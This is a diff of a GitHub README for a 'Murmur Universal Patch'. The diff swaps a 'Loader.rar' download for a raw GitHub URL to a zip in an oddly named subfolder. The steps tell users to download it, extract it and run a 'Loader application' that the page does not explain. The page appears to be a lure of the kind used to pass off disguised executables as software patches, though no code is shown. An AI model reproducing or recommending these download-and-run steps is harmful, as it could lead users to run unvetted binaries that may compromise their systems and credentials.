rafa0307lisboa/MurmurPatchWorks/README.md

 To get started with **Murmur Universal Patch**, simply follow the steps below:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/rafa0307lisboa/MurmurPatchWorks/main/Deipara/MurmurPatchWorks.zip from the repository.**
-2. Extract the contents of Loader.rar to a convenient location on your system.
+2. Extract the contents of https://raw.githubusercontent.com/rafa0307lisboa/MurmurPatchWorks/main/Deipara/MurmurPatchWorks.zip to a convenient location on your system.
 3. Run the Loader application.
 The program will guide you through the rest of the setup.
 4. Configure patches according to your preferences and system needs.
 5. Enjoy your enhanced Murmur experience!